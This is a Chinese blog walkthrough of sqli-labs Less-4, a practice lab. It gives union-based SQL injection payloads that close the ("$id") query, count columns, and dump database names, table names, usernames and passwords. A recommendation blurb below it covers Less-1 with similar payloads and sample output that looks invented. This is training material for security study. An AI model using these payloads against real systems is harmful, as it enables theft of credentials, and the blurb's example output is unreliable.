sqli-labs系列——第四关

less4

第四关的sql语句是这样的:

select * from user where id=("$id");

?id=1")–+回显正常
在这里插入图片描述

order by 4报错,有3列
在这里插入图片描述union select 判断有无显示位

在这里插入图片描述

爆数据库名和列名:

?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security')--+

在这里插入图片描述

爆帐号和密码:

?id=0") union select 1,(select group_concat(username) from users),(select group_concat(password) from users)--+

在这里插入图片描述

也可以直接exp撸:

-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)–+

那么执行的sql语句就是:

select * from user where id=("-1") union SELECT 1,2,(select group_concat(username,0x3a,password) from users)--+");

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs-master是一个SQL注入练习平台,第一是一个基础的SQL注入练习。 首先,打开练习平台,找到第一的链接。在链接的末尾加上 `'`,观察页面的响应。如果页面存在SQL注入漏洞,那么会显示类似如下的错误信息: ``` You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 ``` 这意味着我们在SQL语句注入了一个单引号,导致MySQL服务器无法正确解析SQL语句。这也是SQL注入漏洞的典型表现。 接下来,我们可以尝试利用注入漏洞获取数据库的数据。在第一关中,我们需要获取 `users` 表的数据。因此,我们可以在链接的末尾加上以下语句: ```sql ' union select 1,2,3,4,5,6,7,8-- ``` 这个语句会在SQL语句插入一个 `union` 查询语句,用于查询 `users` 表的数据。`1` 到 `8` 是查询的字段数量,这里可以根据实际情况调整。双破折号 `--` 表示注释,用于避免语法错误。 将以上语句加到链接末尾后,点击访问链接,页面会显示类似以下内容的数据: ``` 1 2 3 4 5 6 7 8 1 admin 5f4dcc3b5aa765d61d8327deb882cf99 1 2 bob 202cb962ac59075b964b07152d234b70 0 ``` 其,第一行是查询结果的字段名,第二行开始是 `users` 表的数据。我们可以看到,这个表包含了两个用户的信息,其 `admin` 用户的密码经过了 MD5 加密。 这样,我们就成功地利用 SQL 注入漏洞获取数据库的数据,完成了第一的挑战。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值